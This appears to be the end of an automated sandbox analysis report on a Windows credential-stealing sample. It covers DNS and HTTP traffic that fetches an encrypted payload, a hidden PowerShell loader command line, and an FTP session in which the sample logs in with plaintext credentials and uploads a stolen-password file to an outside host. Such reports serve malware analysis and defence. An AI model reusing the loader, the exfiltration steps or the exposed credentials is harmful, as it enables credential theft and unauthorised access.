                                      Nov 9, 2024 20:47:10.320662022 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.320754051 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.320763111 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.320806980 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.321789980 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.321827888 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.321852922 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.321855068 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:10.321882010 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.321899891 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.321973085 CET49803443192.168.2.4185.36.171.17
                                      Nov 9, 2024 20:47:10.321985006 CET44349803185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:11.371166945 CET4981921192.168.2.486.107.36.93
                                      Nov 9, 2024 20:47:11.375993967 CET214981986.107.36.93192.168.2.4
                                      Nov 9, 2024 20:47:11.376101971 CET4981921192.168.2.486.107.36.93
                                      Nov 9, 2024 20:47:12.126977921 CET214981986.107.36.93192.168.2.4
                                      Nov 9, 2024 20:47:12.127192020 CET4981921192.168.2.486.107.36.93
                                      Nov 9, 2024 20:47:12.132014036 CET214981986.107.36.93192.168.2.4
                                      Nov 9, 2024 20:47:12.387361050 CET214981986.107.36.93192.168.2.4
                                      Nov 9, 2024 20:47:12.389625072 CET4981921192.168.2.486.107.36.93
                                      Nov 9, 2024 20:47:12.394354105 CET214981986.107.36.93192.168.2.4
                                      Nov 9, 2024 20:47:12.713813066 CET214981986.107.36.93192.168.2.4
                                      Nov 9, 2024 20:47:12.714898109 CET4981921192.168.2.486.107.36.93
                                      Nov 9, 2024 20:47:12.719691992 CET214981986.107.36.93192.168.2.4
                                      Nov 9, 2024 20:47:12.975193977 CET214981986.107.36.93192.168.2.4
                                      Nov 9, 2024 20:47:12.975423098 CET4981921192.168.2.486.107.36.93
                                      Nov 9, 2024 20:47:12.980310917 CET214981986.107.36.93192.168.2.4
                                      Nov 9, 2024 20:47:13.235774040 CET214981986.107.36.93192.168.2.4
                                      Nov 9, 2024 20:47:13.235918045 CET4981921192.168.2.486.107.36.93
                                      Nov 9, 2024 20:47:13.240782022 CET214981986.107.36.93192.168.2.4
                                      Nov 9, 2024 20:47:13.496486902 CET214981986.107.36.93192.168.2.4
                                      Nov 9, 2024 20:47:13.496649027 CET4981921192.168.2.486.107.36.93
                                      Nov 9, 2024 20:47:13.501627922 CET214981986.107.36.93192.168.2.4
                                      Nov 9, 2024 20:47:13.757342100 CET214981986.107.36.93192.168.2.4
                                      Nov 9, 2024 20:47:13.758055925 CET4983535643192.168.2.486.107.36.93
                                      Nov 9, 2024 20:47:13.762873888 CET356434983586.107.36.93192.168.2.4
                                      Nov 9, 2024 20:47:13.762938023 CET4983535643192.168.2.486.107.36.93
                                      Nov 9, 2024 20:47:13.762980938 CET4981921192.168.2.486.107.36.93
                                      Nov 9, 2024 20:47:13.767704010 CET214981986.107.36.93192.168.2.4
                                      Nov 9, 2024 20:47:14.514755964 CET214981986.107.36.93192.168.2.4
                                      Nov 9, 2024 20:47:14.515002966 CET4983535643192.168.2.486.107.36.93
                                      Nov 9, 2024 20:47:14.515065908 CET4983535643192.168.2.486.107.36.93
                                      Nov 9, 2024 20:47:14.519773006 CET356434983586.107.36.93192.168.2.4
                                      Nov 9, 2024 20:47:14.520247936 CET356434983586.107.36.93192.168.2.4
                                      Nov 9, 2024 20:47:14.520298958 CET4983535643192.168.2.486.107.36.93
                                      Nov 9, 2024 20:47:14.569473982 CET4981921192.168.2.486.107.36.93
                                      Nov 9, 2024 20:47:14.776060104 CET214981986.107.36.93192.168.2.4
                                      Nov 9, 2024 20:47:14.819468021 CET4981921192.168.2.486.107.36.93
                                      Nov 9, 2024 20:47:19.172878027 CET8049797185.36.171.17192.168.2.4
                                      Nov 9, 2024 20:47:19.172935963 CET4979780192.168.2.4185.36.171.17
                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 9, 2024 20:47:06.957176924 CET5240353192.168.2.41.1.1.1
                                      Nov 9, 2024 20:47:07.004362106 CET53524031.1.1.1192.168.2.4
                                      Nov 9, 2024 20:47:11.266045094 CET5889053192.168.2.41.1.1.1
                                      Nov 9, 2024 20:47:11.367460966 CET53588901.1.1.1192.168.2.4
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Nov 9, 2024 20:47:06.957176924 CET192.168.2.41.1.1.10xf12dStandard query (0)abreo.plA (IP address)IN (0x0001)false
                                      Nov 9, 2024 20:47:11.266045094 CET192.168.2.41.1.1.10x3d45Standard query (0)ftp.carbognin.itA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Nov 9, 2024 20:47:07.004362106 CET1.1.1.1192.168.2.40xf12dNo error (0)abreo.pl185.36.171.17A (IP address)IN (0x0001)false
                                      Nov 9, 2024 20:47:11.367460966 CET1.1.1.1192.168.2.40x3d45No error (0)ftp.carbognin.it86.107.36.93A (IP address)IN (0x0001)false
                                      • abreo.pl
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449797185.36.171.1780600C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 9, 2024 20:47:07.016972065 CET168OUTGET //CNDKMREh44.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                      Host: abreo.pl
                                      Cache-Control: no-cache
                                      Nov 9, 2024 20:47:08.054354906 CET1031INHTTP/1.1 301 Moved Permanently
                                      Connection: Keep-Alive
                                      Keep-Alive: timeout=5, max=100
                                      content-type: text/html
                                      content-length: 795
                                      date: Sat, 09 Nov 2024 19:47:07 GMT
                                      server: LiteSpeed
                                      location: https://abreo.pl//CNDKMREh44.bin
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449803185.36.171.17443600C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      2024-11-09 19:47:09 UTC192OUTGET //CNDKMREh44.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                      Cache-Control: no-cache
                                      Host: abreo.pl
                                      Connection: Keep-Alive
                                      2024-11-09 19:47:09 UTC496INHTTP/1.1 200 OK
                                      Connection: close
                                      cache-control: public, max-age=0
                                      expires: Sat, 09 Nov 2024 19:47:09 GMT
                                      content-type: application/octet-stream
                                      last-modified: Wed, 30 Oct 2024 05:27:35 GMT
                                      accept-ranges: bytes
                                      content-length: 241728
                                      date: Sat, 09 Nov 2024 19:47:09 GMT
                                      server: LiteSpeed
                                      vary: User-Agent
                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                      2024-11-09 19:47:09 UTC872INData Raw: c0 f2 86 66 79 69 20 08 21 35 6b 9b 95 76 74 e6 a7 74 dd d9 0b e3 b6 9e b7 57 63 74 c4 95 fa d6 c2 8d 40 43 d8 75 36 20 c0 b9 3b 75 16 3e a9 90 ec b9 87 83 c9 41 75 c6 33 63 b5 e9 fc cb 3e 43 c6 ae 1e 81 31 52 5c fd c2 f7 c1 ab 39 85 e5 e4 e3 84 65 ab 8e 76 fc b6 2b dd 33 57 af 4f be cd db 55 6c 84 27 9d 36 7d 92 17 5b 54 e0 4f 8a 73 4c ee b5 0a 1d 8b 12 d1 92 d6 d4 a6 52 9a 75 3a 7e a5 68 ce 32 44 02 c0 f6 6d 0d 39 f3 8d 44 db 2b ad c1 7f 1c cc 7d 00 97 1b c6 49 24 e2 0c 28 c4 12 37 19 8c 51 f3 49 10 e2 98 ad 08 00 d6 c4 a3 b3 88 85 f8 18 e4 59 8e 29 1f f9 0f f2 76 da 04 20 3f bd 21 c8 57 1a c3 22 57 cd 7f 8c 44 72 cf fd 12 21 b0 ae 6c 07 d9 fd e2 e2 7d 66 ce ef 4a 58 95 c8 5b 76 0a c2 bb 22 ce 02 e6 25 49 90 e7 d2 73 95 e8 89 7c 8c ab b6 26 55 ff 49 f8
                                      Data Ascii: fyi !5kvttWct@Cu6 ;u>Au3c>C1R\9ev+3WOUl'6}[TOsLRu:~h2Dm9D+}I$(7QIY)v ?!W"WDr!l}fJX[v"%Is|&UI
                                      2024-11-09 19:47:09 UTC14987INData Raw: 1d d6 82 4e ee e0 5a 52 2b a1 49 f7 5f ad 54 a7 94 1a 7d 74 3b 19 6b ee a4 3c 8f 4a 06 7d 7d be 56 1b 00 bf 2b 57 e9 56 ca 57 d7 83 37 db 61 f9 75 7e 34 88 cb 09 2d a5 9e 64 33 dc 90 41 4f de 07 38 f6 10 ae 73 cb 94 02 d3 67 aa 92 5e 02 0b 6d bd a4 24 cc ae e3 02 2f 77 b0 5c 09 a9 e7 1c b2 14 4b 21 ab b0 15 7d 6a 71 03 44 62 0f 57 05 ef 5e 68 61 f8 e4 2d 44 3a f8 d6 1f d1 2c c0 24 49 24 3c 8d 31 31 58 72 cb d5 58 7e ad fb 49 f5 5d c0 17 25 40 fd 1d c9 73 84 4a 6f c2 12 e3 28 b2 4a 86 17 00 67 37 60 c9 3e a3 48 77 02 a6 9d f7 1a 58 d9 1a d4 65 09 e6 cc 2c ba 37 c1 3d 81 ce 54 dc c1 13 6a cf f2 a1 7c 2c 24 fb 00 5d a5 ce 9d 96 4f 55 50 00 1d 1a 5c 8a d8 5e 5d ca 17 d9 6e d4 f6 1b 15 e2 83 10 bb 2c d9 16 c4 c7 a0 e7 86 a2 b3 e0 20 78 f4 3b 44 9a e6 d9 1c 4e
                                      Data Ascii: NZR+I_T}t;k<J}}V+WVW7au~4-d3AO8sg^m$/w\K!}jqDbW^ha-D:,$I$<11XrX~I]%@sJo(Jg7`>HwXe,7=Tj|,$]OUP\^]n, x;DN
                                      2024-11-09 19:47:09 UTC16384INData Raw: 8e c3 6e 67 dc e5 e6 ea c5 2b bd af 2a 67 fd ac 35 ab 36 02 28 c0 b4 6b cc cc 37 4e 24 72 49 99 51 95 f8 1f 8e 86 26 aa de 77 79 0a c1 1d ba a9 e4 3d a5 4d 99 d7 d1 01 4c 38 48 70 57 aa a0 e7 0b 11 82 2e c3 cd 9f d6 7f a7 fc 45 53 56 06 e1 e8 fe c9 2a b6 cb b3 94 46 83 e3 9c 0d 42 ed 73 5a 27 90 ca 0d 9c 11 65 5e 37 d3 70 db d5 e1 3e 3f 04 76 8f a7 99 80 ce 9c cc 85 d2 94 33 41 b4 53 ef 43 a4 6f 5a 0b 4d 9c 96 b8 12 ac 4c 4c 94 2b 91 7d 39 40 f7 f4 23 26 82 6f ef d7 17 1f 2a 81 e2 5f 6a 09 75 04 88 8b ea c3 94 41 d6 f2 f1 19 df 42 8d bc 82 4b 2a a1 b6 f6 87 a8 ac b3 d6 9f bf e8 dd 01 2a c7 58 98 d5 3f 78 0f 5a c6 88 3f 7e 72 73 89 0e 1b 71 00 c3 c2 f3 4e 1f c1 d7 87 6b 09 0b 4f 99 32 55 15 ec 55 ca a1 87 19 7f 1a d5 75 4b d0 6c 27 9c 5d 42 9e e4 a1 d4 82
                                      Data Ascii: ng+*g56(k7N$rIQ&wy=ML8HpW.ESV*FBsZ'e^7p>?v3ASCoZMLL+}9@#&o*_juABK**X?xZ?~rsqNkO2UUuKl']B
                                      2024-11-09 19:47:10 UTC16384INData Raw: ad 1d 72 08 7a e1 2a bb 80 67 47 df ab 54 7c aa 03 87 27 30 8b af b3 ff b1 7a 1b 30 d0 e3 e0 f6 14 e9 53 aa 71 e1 f7 00 f2 88 d6 5b 65 c1 b1 63 c9 da 73 0d 9f 4d 57 80 72 48 71 cf d7 53 15 50 ae 6e 06 d2 fc e5 e1 7d c0 df ef 4a 50 8b cb 5b 76 0c c2 a5 e7 cc 02 e6 04 49 90 e7 32 f2 96 e8 89 3c 8d ab 96 a4 51 ff 4b fe df 48 98 b3 cd 70 30 e8 e4 6d 4e 0f 40 d8 62 ca 0c bf 89 97 44 84 5d 5b a8 6a a9 26 d0 f7 71 b2 e6 7b b3 46 3a 7b 66 3a 7a 96 05 c7 90 84 03 9f f7 25 bf 37 ed 4f 1b db 5e e1 41 32 2e a0 b9 3c 3f 83 13 99 7a 05 75 85 56 16 31 0a 90 54 0a 5c 47 12 0e 80 18 b0 42 c4 98 a6 00 75 12 b1 0c e5 a7 cb 73 86 f6 f7 3c 4b e9 76 f8 62 06 0b ef dd d5 62 96 94 c1 58 5d cb 5f 01 1a 92 f3 bb 43 6c c1 7a cc b8 f1 40 5b 21 a9 35 9a 26 5b 9f 4c 62 52 b4 0a 57 ad
                                      Data Ascii: rz*gGT|'0z0Sq[ecsMWrHqSPn}JP[vI2<QKHp0mN@bD][j&q{F:{f:z%7O^A2.<?zuV1T\GBus<KvbbX]_Clz@[!5&[LbRW
                                      2024-11-09 19:47:10 UTC16384INData Raw: 9a 88 71 3b b3 0c 29 7f 60 ae 2d 8b 02 25 32 5d 02 61 5e b6 46 e8 da 82 46 d7 9e 44 c9 d5 41 70 3f be 9e f7 4a 66 37 62 a0 9d fe ae 7e d4 c0 4c 52 44 6f 22 37 14 5b 8d 2b 59 2b 56 96 f0 08 7e 28 46 58 0b e2 43 10 b9 56 2a 80 6d b4 71 d9 3d 7d 85 2b 2b b2 e3 45 6f 63 0d 03 2f 83 7e e3 a6 5b a6 b6 65 3a cb cb 28 93 c5 c0 8f 80 21 a5 e3 1b c3 de 8f 78 8b db af f8 c8 0b 4a 85 5f 1c ad 13 eb e3 1b 10 d2 9a 20 a3 43 36 fa 1b c3 b8 04 c3 f7 06 b3 55 c9 67 70 9d 32 b2 0c 4f 3e 75 2e 1c db 56 ed 46 ed c2 11 5b 0a 9a 8f f5 ab d5 74 ae a2 fd 31 3c 20 6a 14 f5 12 eb 3d 58 89 b5 a1 60 5c b9 29 38 e4 bf e0 2c 65 f0 94 7e 11 61 a4 58 b9 31 b9 3e dd 07 f8 7c 68 64 bf ca b2 3e f5 60 6e f9 71 0a a0 bf 38 b2 b1 62 e3 64 cc c6 54 6f 60 7b e5 b0 8f 73 3e 86 31 0f 52 4e 97 70
                                      Data Ascii: q;)`-%2]a^FFDAp?Jf7b~LRDo"7[+Y+V~(FXCV*mq=}++Eoc/~[e:(!xJ_ C6Ugp2O>u.VF[t1< j=X`\)8,e~aX1>|hd>`nq8bdTo`{s>1RNp
                                      2024-11-09 19:47:10 UTC16384INData Raw: 3a 6a 6c 3d 19 f2 91 f7 f6 ce c4 e2 29 7b f7 15 eb ed 6f 11 da 36 45 17 bd 8d 51 bc b5 72 1a d2 aa 2a cd 7c 38 c7 09 4f e8 68 79 84 8b 64 73 02 87 6d db 82 b0 a4 ed 5a 72 6a a1 49 f7 31 8d 55 a7 b1 1a 25 f9 13 19 6b ef 7e 32 81 4a 58 7d 7d be d5 98 01 bf a5 c4 01 3f b9 f8 d6 8d 27 db 13 76 42 9e c1 46 4f 75 bc 26 08 3b c1 eb fb 9e 92 e8 05 8a 89 4b ca b5 10 7c d9 49 cd ed 41 fa 0b 56 f5 92 cc ea bb ed 51 49 db 9e d1 f8 fc c2 a1 d1 5b 4a 2c 27 e7 d9 4c 7a 61 89 0b 4d 60 67 7b 07 e3 69 98 26 08 1d d9 65 38 fc d2 8b f3 fb c4 27 45 59 3c c6 cf c8 ac 53 38 f3 d9 44 9a 6f 92 5f 25 63 ae c3 33 86 88 b5 73 7a 44 7d c2 32 1c 28 b2 ca 78 19 14 e7 8f b6 35 3e a3 b6 fb 0c 26 63 7b 8e 58 48 3a 74 9a 09 66 f2 7f b9 b7 41 43 8d 95 3a 43 af 6b 0f 7e a6 b1 5c 5e 41 b4 f6
                                      Data Ascii: :jl=){o6EQr*|8OhydsmZrjI1U%k~2JX}}?'vBFOu&;K|IAVQI[J,'LzaM`g{i&e8'EY<S8Do_%c3szD}2(x5>&c{XH:tfAC:Ck~\^A
                                      2024-11-09 19:47:10 UTC16384INData Raw: c3 aa a3 b3 53 00 76 97 95 32 a5 f7 21 30 af 5f d6 2f 0f 55 51 27 99 1b 0e 0b 18 72 06 66 85 78 c7 15 33 f9 2a 41 9c 4c 12 ec 13 f5 a4 08 6f 6a 09 ca 4f c5 e7 da 01 05 9a b1 c6 21 0d d6 60 96 68 a2 ed bb d2 14 4c 57 84 11 d2 04 4a 21 32 fd 6d 8f f1 56 e2 aa 4b cd 72 30 6c 1d 9f 4e ed 00 f6 98 48 a3 a5 43 c2 2f dd 34 8a 89 9e f4 e0 0a 02 8b 66 90 6c 87 d3 6b 76 03 f1 28 39 21 af 8a 03 70 2a 7b 2c 61 c9 15 0a e6 2f b4 1a 85 08 ce ec a6 66 17 8b 5a e8 bb 95 52 14 21 b0 d8 83 9b 8c cc df c8 3a 9f 18 b0 20 37 bf 64 bd 75 7e 95 bf d5 4b 97 11 58 15 af 69 21 30 df f3 89 7f 53 02 9d e9 80 b2 87 f9 ec 05 da 87 65 dd e9 d1 92 d2 98 cd 7d e6 54 d5 36 2f e3 35 76 fe 5d 66 02 70 23 d6 fb 27 dd 16 b4 e9 be 57 6a 01 2c 8b 87 01 80 5b fb 45 13 79 46 ed cf 11 60 43 ae 92
                                      Data Ascii: Sv2!0_/UQ'rfx3*ALojO!`hLWJ!2mVKr0lNHC/4flkv(9!p*{,a/fZR!: 7du~KXi!0Se}T6/5v]fp#'Wj,[EyF`C
                                      2024-11-09 19:47:10 UTC16384INData Raw: 85 fe e1 86 11 77 0f 73 49 cf e8 ae a9 ab 85 cb 03 36 ca 8f bc 06 de 93 c7 83 b5 dd ec 50 f2 a2 5e 43 0a 0c 88 1c 2f 29 00 50 32 0c e8 73 6c 40 ca 1f 58 a8 71 9f 5a cc 90 fe a9 ec db c0 1d 87 0a 97 88 10 2d 6c 97 89 7f 4a fa 6d 2a ba 32 70 cf bb 9d 79 f5 5d 5e 44 a5 a8 6d 0f fb ff 33 7c 0b c2 8c c7 1c 42 ec e7 96 e2 ff 2b bd a5 a6 5a c7 89 45 83 08 fc 21 ca c7 6c b8 cc 31 25 b4 7a 49 93 0a ed f8 1f 8a 50 42 aa de 7d be 99 c1 1d 9a 98 e6 3d a5 b3 66 e0 e5 01 4c c6 3a cb 57 8a a6 95 f0 2d 7c 5f 84 66 9f d6 7b 2b fc 78 53 5d 5e da e8 fa eb 3d 8a c8 b9 de 75 42 1c 63 27 32 91 72 5a df f1 a6 0c 9c e5 49 4e 37 f3 74 25 db e1 c0 3e c3 58 8f a7 b9 73 c7 9c cc 5e a8 dd 05 41 b0 21 5c fa a4 1f 76 63 0a a1 9c b5 1c 1b 4c 48 b0 5c c6 40 39 ce d1 cd 23 26 76 11 d1 d4
                                      Data Ascii: wsI6P^C/)P2sl@XqZ-lJm*2py]^Dm3|B+ZE!l1%zIPB}=fL:W-|_f{+xS]^=uBc'2rZIN7t%>Xs^A!\vcLH\@9#&v
                                      2024-11-09 19:47:10 UTC16384INData Raw: 7f 3e b7 1a dd d0 92 2c 07 77 70 9e e4 8b 0a 80 93 32 52 a2 f1 d4 f7 e1 86 c6 7a e5 1a 5a bd 6b ab 8e 76 c4 fd 95 22 cc 77 81 4f be cd 25 5b 7e 84 27 63 3a 6f 92 37 7e 54 e0 4f 74 72 75 d7 b5 0a 1d 75 1e d5 92 28 d8 ac d2 15 23 3a 70 b8 2c c9 32 f0 70 ce d7 d5 08 8b 32 a8 10 4d 4e d4 e1 80 38 a3 1a 70 8d be e6 2a 41 e5 f3 29 cd f5 55 7c a8 03 a0 27 30 8b 08 83 5e 4f 85 1a c2 ce ec c0 e1 15 e9 53 54 28 26 83 0f f2 76 24 5d 65 3f c6 ab c9 54 1e cc de b0 a8 81 80 47 72 97 72 4a 21 50 ac 15 d6 d2 fc ed 1c 71 cd cd c7 db 51 95 c2 a5 7f 0a c2 de 27 cd 02 e2 fb 45 95 e7 41 f9 94 e8 83 c2 80 a3 96 55 c7 fe 4b f2 f7 c6 99 b2 c7 8e 3d f8 d4 18 c4 10 44 d2 4a 5b 0d bf 92 9f cb 85 5d 51 a8 68 bb 26 16 b9 7d b2 69 2d 4d 4a 2e 00 81 3d 7a 92 6c 56 07 bd 0d 95 55 05 93
                                      Data Ascii: >,wp2RzZkv"wO%[~'c:o7~TOtruu(#:p,2p2MN8p*A)U|'0^OST(&v$]e?TGrrJ!PqQ'EAUK=DJ[]Qh&}i-MJ.=zlVU
                                      2024-11-09 19:47:10 UTC16384INData Raw: be ab 26 bf 35 64 d4 5e 89 6c 44 53 b4 0a a9 52 bf 12 14 cc 26 fe 8b d3 ce 17 62 2d 2e e4 f2 53 e4 df 42 13 46 9e f5 6e 93 e0 b0 5e c4 a2 ee bd 67 30 ba 82 43 02 3f 9e 01 9a fd cf 87 f6 f1 eb 32 d5 31 f6 2f c6 5c 33 28 e0 43 0a dc b4 aa 33 a7 ba c2 ee 21 ee 18 dd ec d9 91 be bd ac de 4c 91 91 96 88 69 47 b1 0c 29 27 60 ac 21 8b 02 2d 32 5d 02 61 51 86 54 e8 24 8e 3c ab be 45 c3 2b 4f 8e 3e a7 8e f7 4a 66 e9 6c aa 9d fe ae 7c de c0 4c 55 44 6f 22 37 1b 6b 24 2a a7 27 a1 9a d1 08 11 8e 46 a6 00 25 47 18 b9 6e 4c a1 6c b4 8f d4 cb 73 a4 8c 2b 4c e5 b2 61 41 18 fd 23 81 80 ca 56 5e a6 bc 9b 0c cd cb d6 9f fe 0b 49 72 de 5b ef e7 cf f4 94 b6 81 dc 6e 25 c4 09 c8 85 a1 01 8e 13 cb e2 1b ee dc b3 26 9b 72 1d d2 13 c3 46 23 3c f9 25 b3 26 4e 66 8e 9a f5 b6 08 4f
                                      Data Ascii: &5d^lDSR&b-.SBFn^g0C?21/\3(C3!LiG)'`!-2]aQT$<E+O>Jfl|LUDo"7k$*'F%GnLls+LaA#V^Ir[n%&rF#<%&NfO


                                      TimestampSource PortDest PortSource IPDest IPCommands
                                      Nov 9, 2024 20:47:12.126977921 CET214981986.107.36.93192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed.220-Local time is now 20:46. Server port: 21.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed.220-Local time is now 20:46. Server port: 21.220-This is a private system - No anonymous login
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed.220-Local time is now 20:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed.220-Local time is now 20:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                      Nov 9, 2024 20:47:12.127192020 CET4981921192.168.2.486.107.36.93USER server@carbognin.it
                                      Nov 9, 2024 20:47:12.387361050 CET214981986.107.36.93192.168.2.4331 User server@carbognin.it OK. Password required
                                      Nov 9, 2024 20:47:12.389625072 CET4981921192.168.2.486.107.36.93PASS 59Cif8wZUH#X
                                      Nov 9, 2024 20:47:12.713813066 CET214981986.107.36.93192.168.2.4230 OK. Current restricted directory is /
                                      Nov 9, 2024 20:47:12.975193977 CET214981986.107.36.93192.168.2.4504 Unknown command
                                      Nov 9, 2024 20:47:12.975423098 CET4981921192.168.2.486.107.36.93PWD
                                      Nov 9, 2024 20:47:13.235774040 CET214981986.107.36.93192.168.2.4257 "/" is your current location
                                      Nov 9, 2024 20:47:13.235918045 CET4981921192.168.2.486.107.36.93TYPE I
                                      Nov 9, 2024 20:47:13.496486902 CET214981986.107.36.93192.168.2.4200 TYPE is now 8-bit binary
                                      Nov 9, 2024 20:47:13.496649027 CET4981921192.168.2.486.107.36.93PASV
                                      Nov 9, 2024 20:47:13.757342100 CET214981986.107.36.93192.168.2.4227 Entering Passive Mode (86,107,36,93,139,59)
                                      Nov 9, 2024 20:47:13.762980938 CET4981921192.168.2.486.107.36.93STOR PW_user-114127_2024_11_09_14_47_10.html
                                      Nov 9, 2024 20:47:14.514755964 CET214981986.107.36.93192.168.2.4150 Accepted data connection
                                      Nov 9, 2024 20:47:14.776060104 CET214981986.107.36.93192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.261 seconds (measured here), 1.19 Kbytes per second

                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:14:45:51
                                      Start date:09/11/2024
                                      Path:C:\Users\user\Desktop\Amalgamers.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\Amalgamers.exe"
                                      Imagebase:0x400000
                                      File size:942'432 bytes
                                      MD5 hash:E2A5B947AC8266E79CC0C9FAFF051849
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:14:45:52
                                      Start date:09/11/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "
                                      Imagebase:0x1e0000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:14:45:52
                                      Start date:09/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:14:46:49
                                      Start date:09/11/2024
                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                      Imagebase:0x7ff72bec0000
                                      File size:59'904 bytes
                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
